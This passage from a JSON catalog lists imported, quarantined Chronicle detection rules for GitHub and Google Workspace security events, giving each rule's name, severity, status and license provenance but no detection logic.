"chronicle-detection-rules-github-personal-access-token-auto-approve-policy-modified", "type": "detection", "name": "github_personal_access_token_auto_approve_policy_modified", "description": "github_personal_access_token_auto_approve_policy_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-personal-access-token-auto-approve-policy-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_personal_access_token_auto_approve_policy_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_personal_access_token_auto_approve_policy_modified.yaral" } }, { "id": "chronicle-detection-rules-github-personal-access-token-created-from-tor-ip-address", "type": "detection", "name": "github_personal_access_token_created_from_tor_ip_address", "description": "github_personal_access_token_created_from_tor_ip_address", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-personal-access-token-created-from-tor-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"github_personal_access_token_created_from_tor_ip_address", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_personal_access_token_created_from_tor_ip_address.yaral" } }, { "id": "chronicle-detection-rules-github-repository-archived-or-deleted", "type": "detection", "name": "github_repository_archived_or_deleted", "description": "github_repository_archived_or_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-repository-archived-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_repository_archived_or_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_repository_archived_or_deleted.yaral" } }, { "id": "chronicle-detection-rules-github-repository-branch-protection-rules-disabled", "type": "detection", "name": "github_repository_branch_protection_rules_disabled", "description": "github_repository_branch_protection_rules_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/github-repository-branch-protection-rules-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_repository_branch_protection_rules_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_repository_branch_protection_rules_disabled.yaral" } }, { "id": "chronicle-detection-rules-github-repository-deploy-key-created-or-modified", "type": "detection", "name": "github_repository_deploy_key_created_or_modified", "description": "github_repository_deploy_key_created_or_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-repository-deploy-key-created-or-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_repository_deploy_key_created_or_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_repository_deploy_key_created_or_modified.yaral" } }, { "id": "chronicle-detection-rules-github-repository-visibility-changed-to-public", "type": "detection", "name": "github_repository_visibility_changed_to_public", "description": "github_repository_visibility_changed_to_public", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-repository-visibility-changed-to-public.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_repository_visibility_changed_to_public", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_repository_visibility_changed_to_public.yaral" } }, { "id": "chronicle-detection-rules-github-secret-scanning-alert", "type": "detection", "name": "github_secret_scanning_alert", "description": "github_secret_scanning_alert", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-secret-scanning-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_secret_scanning_alert", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_secret_scanning_alert.yaral" } }, { "id": "chronicle-detection-rules-github-secret-scanning-disabled-or-bypassed", "type": "detection", "name": "github_secret_scanning_disabled_or_bypassed", "description": 
"github_secret_scanning_disabled_or_bypassed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-secret-scanning-disabled-or-bypassed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_secret_scanning_disabled_or_bypassed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_secret_scanning_disabled_or_bypassed.yaral" } }, { "id": "chronicle-detection-rules-github-sso-configuration-modified", "type": "detection", "name": "github_sso_configuration_modified", "description": "github_sso_configuration_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-sso-configuration-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_sso_configuration_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_sso_configuration_modified.yaral" } }, { "id": 
"chronicle-detection-rules-github-two-factor-authentication-requirement-disabled", "type": "detection", "name": "github_two_factor_authentication_requirement_disabled", "description": "github_two_factor_authentication_requirement_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-two-factor-authentication-requirement-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_two_factor_authentication_requirement_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_two_factor_authentication_requirement_disabled.yaral" } }, { "id": "chronicle-detection-rules-github-user-blocked-from-accessing-organization-repositories", "type": "detection", "name": "github_user_blocked_from_accessing_organization_repositories", "description": "github_user_blocked_from_accessing_organization_repositories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-user-blocked-from-accessing-organization-repositories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"github_user_blocked_from_accessing_organization_repositories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_user_blocked_from_accessing_organization_repositories.yaral" } }, { "id": "chronicle-detection-rules-github-user-unblocked-from-accessing-organization-repositories", "type": "detection", "name": "github_user_unblocked_from_accessing_organization_repositories", "description": "github_user_unblocked_from_accessing_organization_repositories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-user-unblocked-from-accessing-organization-repositories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_user_unblocked_from_accessing_organization_repositories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_user_unblocked_from_accessing_organization_repositories.yaral" } }, { "id": "chronicle-detection-rules-gmail-spike-in-undeliverables", "type": "detection", "name": "gmail_spike_in_undeliverables", "description": "gmail_spike_in_undeliverables", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, 
"path": "detections/chronicle-imports/_quarantine/gmail-spike-in-undeliverables.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gmail_spike_in_undeliverables", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/gmail_spike_in_undeliverables.yaral" } }, { "id": "chronicle-detection-rules-godlua-malware-detector-sysmon-behavior", "type": "detection", "name": "godlua_malware_detector_sysmon_behavior", "description": "godlua_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/godlua-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "godlua_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/godlua_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-google-cloud-service-account-key-created-or-uploaded", "type": "detection", "name": "google_cloud_service_account_key_created_or_uploaded", "description": "google_cloud_service_account_key_created_or_uploaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-cloud-service-account-key-created-or-uploaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_cloud_service_account_key_created_or_uploaded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/google_cloud_service_account_key_created_or_uploaded.yaral" } }, { "id": "chronicle-detection-rules-google-safebrowsing-file-contacts-tor-exit-node", "type": "detection", "name": "google_safebrowsing_file_contacts_tor_exit_node", "description": "google_safebrowsing_file_contacts_tor_exit_node", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-safebrowsing-file-contacts-tor-exit-node.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_safebrowsing_file_contacts_tor_exit_node", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/google_safebrowsing_file_contacts_tor_exit_node.yaral" } }, { "id": "chronicle-detection-rules-google-safebrowsing-file-process-creation", "type": 
"detection", "name": "google_safebrowsing_file_process_creation", "description": "google_safebrowsing_file_process_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-safebrowsing-file-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_safebrowsing_file_process_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/google_safebrowsing_file_process_creation.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-admin-role-assignment", "type": "detection", "name": "google_workspace_admin_role_assignment", "description": "google_workspace_admin_role_assignment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-admin-role-assignment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_admin_role_assignment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/workspace/google_workspace_admin_role_assignment.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-alerts-aggregated-by-severity", "type": "detection", "name": "google_workspace_alerts_aggregated_by_severity", "description": "google_workspace_alerts_aggregated_by_severity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-alerts-aggregated-by-severity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_alerts_aggregated_by_severity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_alerts_aggregated_by_severity.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-application-added", "type": "detection", "name": "google_workspace_application_added", "description": "google_workspace_application_added", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-application-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_application_added", "source_commit": "74dd490", 
"license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_application_added.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-custom-admin-role-created", "type": "detection", "name": "google_workspace_custom_admin_role_created", "description": "google_workspace_custom_admin_role_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-custom-admin-role-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_custom_admin_role_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_custom_admin_role_created.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-encryption-key-files-accessed-by-anonymous-user", "type": "detection", "name": "google_workspace_encryption_key_files_accessed_by_anonymous_user", "description": "google_workspace_encryption_key_files_accessed_by_anonymous_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-encryption-key-files-accessed-by-anonymous-user.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_encryption_key_files_accessed_by_anonymous_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_encryption_key_files_accessed_by_anonymous_user.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-external-user-added-to-group", "type": "detection", "name": "google_workspace_external_user_added_to_group", "description": "google_workspace_external_user_added_to_group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-external-user-added-to-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_external_user_added_to_group", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_external_user_added_to_group.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-file-shared-from-google-drive-to-free-email-domain", "type": "detection", "name": "google_workspace_file_shared_from_google_drive_to_free_email_domain", "description": "google_workspace_file_shared_from_google_drive_to_free_email_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-file-shared-from-google-drive-to-free-email-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_file_shared_from_google_drive_to_free_email_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_file_shared_from_google_drive_to_free_email_domain.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-malicious-file-downloaded", "type": "detection", "name": "google_workspace_malicious_file_downloaded", "description": "google_workspace_malicious_file_downloaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-malicious-file-downloaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_malicious_file_downloaded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_malicious_file_downloaded.yaral" } }, { "id": 
"chronicle-detection-rules-google-workspace-marketplace-allowlist-configuration", "type": "detection", "name": "google_workspace_marketplace_allowlist_configuration", "description": "google_workspace_marketplace_allowlist_configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-marketplace-allowlist-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_marketplace_allowlist_configuration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_marketplace_allowlist_configuration.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-mfa-disabled", "type": "detection", "name": "google_workspace_mfa_disabled", "description": "google_workspace_mfa_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-mfa-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_mfa_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_mfa_disabled.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-multiple-files-copied-from-google-drive", "type": "detection", "name": "google_workspace_multiple_files_copied_from_google_drive", "description": "google_workspace_multiple_files_copied_from_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-multiple-files-copied-from-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_multiple_files_copied_from_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_multiple_files_copied_from_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-multiple-files-deleted-from-google-drive", "type": "detection", "name": "google_workspace_multiple_files_deleted_from_google_drive", "description": "google_workspace_multiple_files_deleted_from_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/google-workspace-multiple-files-deleted-from-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_multiple_files_deleted_from_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_multiple_files_deleted_from_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-multiple-files-downloaded-from-google-drive", "type": "detection", "name": "google_workspace_multiple_files_downloaded_from_google_drive", "description": "google_workspace_multiple_files_downloaded_from_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-multiple-files-downloaded-from-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_multiple_files_downloaded_from_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_multiple_files_downloaded_from_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-multiple-files-sent-as-email-attachment-from-google-drive", "type": "detection", "name": 
"google_workspace_multiple_files_sent_as_email_attachment_from_google_drive", "description": "google_workspace_multiple_files_sent_as_email_attachment_from_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-multiple-files-sent-as-email-attachment-from-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_multiple_files_sent_as_email_attachment_from_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_multiple_files_sent_as_email_attachment_from_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-new-trusted-domain-added", "type": "detection", "name": "google_workspace_new_trusted_domain_added", "description": "google_workspace_new_trusted_domain_added", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-new-trusted-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_new_trusted_domain_added", "source_commit": "74dd490", "license": 
"Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_new_trusted_domain_added.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-ownership-transferred-on-google-drive", "type": "detection", "name": "google_workspace_ownership_transferred_on_google_drive", "description": "google_workspace_ownership_transferred_on_google_drive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-ownership-transferred-on-google-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_ownership_transferred_on_google_drive", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_ownership_transferred_on_google_drive.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-password-policy-changed", "type": "detection", "name": "google_workspace_password_policy_changed", "description": "google_workspace_password_policy_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-password-policy-changed.yaml", "quarantine_reason": "imported 
